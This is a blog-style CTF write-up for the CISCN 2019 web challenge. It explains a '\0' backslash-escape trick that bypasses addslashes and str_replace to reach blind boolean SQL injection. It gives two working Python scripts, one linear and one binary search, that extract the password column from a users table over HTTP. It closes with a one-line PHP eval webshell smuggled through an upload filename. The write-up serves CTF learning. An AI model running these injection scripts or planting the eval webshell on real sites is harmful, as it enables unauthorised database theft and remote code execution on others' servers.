
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>CISCN2019DAY2WEB1 - 月出从云</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="虽然对于SQL注入我个人是相当不屑的。当前的环境下已经存在彻底磨灭SQL注入的技术了，但是比赛出现的频率依然不低，所以只能把它捡回来了。。orz
拿到文件先从这道题开始说吧，扫目录能扫出来robot,"> 
    
    <link rel="alternative" href="atom.xml" title="月出从云" type="application/atom+xml"> 
    <link rel="icon" href="/img/1.ico"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">月出从云</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">CISCN2019DAY2WEB1</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">CISCN2019DAY2WEB1</h1>
        <div class="stuff">
            <span>十一月 16, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/BUU/" rel="tag">BUU</a></li></ul>


        </div>
        <div class="content markdown">
            <p>虽然对于SQL注入我个人是相当不屑的。当前的环境下已经存在彻底磨灭SQL注入的技术了，但是比赛出现的频率依然不低，所以只能把它捡回来了。。orz</p>
<h1 id="拿到文件"><a href="#拿到文件" class="headerlink" title="拿到文件"></a>拿到文件</h1><p>先从这道题开始说吧，扫目录能扫出来robots.txt,下面有*.php.bak,提示我们可以尝试读取文件，</p>
<p>得到代码我将他稍微修改方便fuzz之后长这样：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//    include &quot;config.php&quot;;</span></span><br><span class="line"></span><br><span class="line">    $id = $_POST[<span class="number">1</span>];</span><br><span class="line">    <span class="keyword">echo</span> $id;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">    $id=addslashes($id);</span><br><span class="line">    $path=addslashes($path);</span><br><span class="line">    <span class="keyword">echo</span> $id;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">    $id=str_replace(<span class="keyword">array</span>(<span class="string">&quot;\\0&quot;</span>,<span class="string">&quot;%00&quot;</span>,<span class="string">&quot;\\&#x27;&quot;</span>,<span class="string">&quot;&#x27;&quot;</span>),<span class="string">&quot;&quot;</span>,$id);</span><br><span class="line">    $path=str_replace(<span class="keyword">array</span>(<span class="string">&quot;\\0&quot;</span>,<span class="string">&quot;%00&quot;</span>,<span class="string">&quot;\\&#x27;&quot;</span>,<span class="string">&quot;&#x27;&quot;</span>),<span class="string">&quot;&quot;</span>,$path);</span><br><span class="line">    <span class="keyword">echo</span> $id;</span><br><span class="line"><span class="comment">//    $result=mysqli_query($con,&quot;select * from images where id=&#x27;&#123;$id&#125;&#x27; or path=&#x27;&#123;$path&#125;&#x27;&quot;);</span></span><br><span class="line"><span class="comment">//    $row=mysqli_fetch_array($result,MYSQLI_ASSOC);</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//    $path=&quot;./&quot; . $row[&quot;path&quot;];</span></span><br><span class="line"><span class="comment">//    header(&quot;Content-Type: image/jpeg&quot;);</span></span><br><span class="line"><span class="comment">//    readfile($path);</span></span><br></pre></td></tr></table></figure>

<h1 id="明确目标"><a href="#明确目标" class="headerlink" title="明确目标"></a>明确目标</h1><p>我们想要得到的目标是什么，很明显，这道题的查询语句如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$result=mysqli_query($con,&quot;<span class="keyword">select</span> * <span class="keyword">from</span> images <span class="keyword">where</span> <span class="keyword">id</span>=<span class="string">&#x27;&#123;$id&#125;&#x27;</span> <span class="keyword">or</span> <span class="keyword">path</span>=<span class="string">&#x27;&#123;$path&#125;&#x27;</span><span class="string">&quot;);</span></span><br></pre></td></tr></table></figure>

<h2 id="注入原理分析"><a href="#注入原理分析" class="headerlink" title="注入原理分析"></a>注入原理分析</h2><p>其中id和path都是我们可控的，在这种情况下，我们其实可以通过吞掉id后面的单引号的方式，进而达到控制查询语句的操作，如图所示：</p>
<p><img src="image-20201116182200504.png" alt="image-20201116182200504"></p>
<p>在SQL语句当中，\转义也是存在的，只要该符号存在，便会自动的对数据进行转义，比如：</p>
<p>如果 在单引号面前加上\，就会被系统认定为字符串类型的 ‘ ,也就起不到闭合语句的作用了。</p>
<p>回到注入上来，我们如果想要逃逸掉对id的注入，想要自己控制语句的话，应该构造如下代码：</p>
<p><img src="image-20201116182632668.png" alt="image-20201116182632668"></p>
<p>通过上面的分析我们可以知道，id后面的单引号由于被\进行了修饰，也就无法起到闭合的作用了，而 name的部分被我们的单引号闭合之后，再通过或逻辑，就可以控制任意查询了。</p>
<h2 id="题目的绕过"><a href="#题目的绕过" class="headerlink" title="题目的绕过"></a>题目的绕过</h2><p>上面一段中我们已经知道第一步的中我们的目标是对id进行控制，使得id最终输出的值最终为 斜杠（\），这样就可以使用path进行注入了，但是我们发现id和path其实都被修饰了，也就无法直接输入斜杠来绕过，利用上面的代码演示如下：</p>
<p><img src="image-20201116183108301.png" alt="image-20201116183108301"></p>
<p>这道题的关键代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$id=str_replace(<span class="keyword">array</span>(<span class="string">&quot;\\0&quot;</span>,<span class="string">&quot;%00&quot;</span>,<span class="string">&quot;\\&#x27;&quot;</span>,<span class="string">&quot;&#x27;&quot;</span>),<span class="string">&quot;&quot;</span>,$id);</span><br><span class="line">$path=str_replace(<span class="keyword">array</span>(<span class="string">&quot;\\0&quot;</span>,<span class="string">&quot;%00&quot;</span>,<span class="string">&quot;\\&#x27;&quot;</span>,<span class="string">&quot;&#x27;&quot;</span>),<span class="string">&quot;&quot;</span>,$path);</span><br></pre></td></tr></table></figure>

<p>我们首先要知道的是，虽然这里写的是\0 ,然而实际上依然是\0,前面的\是用于转义的。</p>
<p>这样想的话，我们便可以通过构造\0的方式来尝试绕过</p>
<p>顺序如下</p>
<p>我们输入的为”\0”  -&gt; 经过addslashes函数之后”\\0”,再经过str_replace函数之后即为\了，</p>
<p><img src="image-20201116184057753.png" alt="image-20201116184057753"></p>
<p>那这里可能就有人想问了，为什么不用\‘ 来绕过，这是因为如果使用\ 和 ‘组合方式，经过addslashes的时候这两个符号都会被转义，这样的话我们就没有办法利用str_replace函数，于是我们构造payload第一步如下：</p>
<p>逐步fuzz..</p>
<p><img src="image-20201116190519711.png" alt="image-20201116190519711"></p>
<p>最终在mysql当中得到如下语句可以fuzz：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> websites <span class="keyword">where</span> <span class="keyword">id</span> = <span class="keyword">if</span>( <span class="keyword">ord</span>( <span class="keyword">substr</span>((<span class="keyword">select</span> <span class="keyword">database</span>() ),<span class="number">1</span>,<span class="number">1</span> ))&gt;<span class="number">145</span>,<span class="number">1</span>,<span class="number">2</span>);</span><br></pre></td></tr></table></figure>

<p>于是构造出在url当中：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;a624b8c4-8225-4f4b-8681-7f29d013c51b.node3.buuoj.cn&#x2F;image.php?id&#x3D;\0&amp;path&#x3D;or id&#x3D;if( ord( substr((select database() ),1,1 ))&gt;&#x3D;99,1,0) %23</span><br></pre></td></tr></table></figure>

<p>那么就该构造脚本了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://a624b8c4-8225-4f4b-8681-7f29d013c51b.node3.buuoj.cn/image.php?id=\\0&amp;path=&quot;</span></span><br><span class="line"><span class="comment"># 上面的id一定要手动加上一个\进行转义，不然会出错的</span></span><br><span class="line"><span class="comment"># print(url)</span></span><br><span class="line"><span class="comment"># print(len(requests.get(&quot;http://a624b8c4-8225-4f4b-8681-7f29d013c51b.node3.buuoj.cn/image.php?id=\\0&amp;path= or&quot;).text))</span></span><br><span class="line"><span class="comment"># len = 117007</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">999</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">47</span>, <span class="number">140</span>):</span><br><span class="line">        sql = <span class="string">&quot;or id=if( ord( substr((select password from users ),&#123;&#125;,1 ))&gt;=&#123;&#125;,1,0) %23&quot;</span>.<span class="built_in">format</span>(i, j)</span><br><span class="line">        <span class="comment"># print(url+sql)</span></span><br><span class="line">        <span class="comment"># databasename = djtdogjob</span></span><br><span class="line">        res = requests.get(url + sql).text</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(res) &lt; <span class="number">1170</span>:</span><br><span class="line">            print(<span class="built_in">len</span>(res))</span><br><span class="line">            print(<span class="built_in">chr</span>(j<span class="number">-1</span>))</span><br><span class="line">            flag += <span class="built_in">chr</span>(j<span class="number">-1</span>)</span><br><span class="line">            print(<span class="string">&quot;flag:&quot;</span> + flag)</span><br><span class="line">            i += <span class="number">1</span></span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>过了非常非常久才出来..其实建议用二分法脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span>  requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://a624b8c4-8225-4f4b-8681-7f29d013c51b.node3.buuoj.cn/image.php?id=\\0&amp;path=&quot;</span></span><br><span class="line">payload = <span class="string">&quot;or id=if(ascii(substr((select password from users),&#123;0&#125;,1))&gt;&#123;1&#125;,1,0)%23&quot;</span></span><br><span class="line">result = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">    l = <span class="number">1</span></span><br><span class="line">    r = <span class="number">130</span></span><br><span class="line">    mid = (l + r)&gt;&gt;<span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span>(l&lt;r):</span><br><span class="line">        payloads = payload.<span class="built_in">format</span>(i,mid)</span><br><span class="line">        <span class="comment"># print(url+payloads)</span></span><br><span class="line">        html = requests.get(url+payloads)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;JFIF&quot;</span> <span class="keyword">in</span> html.text:</span><br><span class="line">            l = mid +<span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            r = mid</span><br><span class="line">        mid = (l + r)&gt;&gt;<span class="number">1</span></span><br><span class="line">    result+=<span class="built_in">chr</span>(mid)</span><br><span class="line">    print(result)</span><br><span class="line">  </span><br></pre></td></tr></table></figure>

<p>再之后是利用短标签上传PHP文件</p>
<p>除此之外我们也要注意到的是他这里是将你的filename写入到这个文件下面，所以我们将一句话写道这个文件下面</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?=eval($_POST[1]);?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="image-20201116205648287.png" alt="image-20201116205648287"></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r='https://github.com/ysllz/ysllz.github.io'
        data-o='https://github.com/ysllz/ysllz.github.io'
        data-a='ysllz'
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8B%BF%E5%88%B0%E6%96%87%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">拿到文件</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%98%8E%E7%A1%AE%E7%9B%AE%E6%A0%87"><span class="toc-number">2.</span> <span class="toc-text">明确目标</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90"><span class="toc-number">2.1.</span> <span class="toc-text">注入原理分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.2.</span> <span class="toc-text">题目的绕过</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
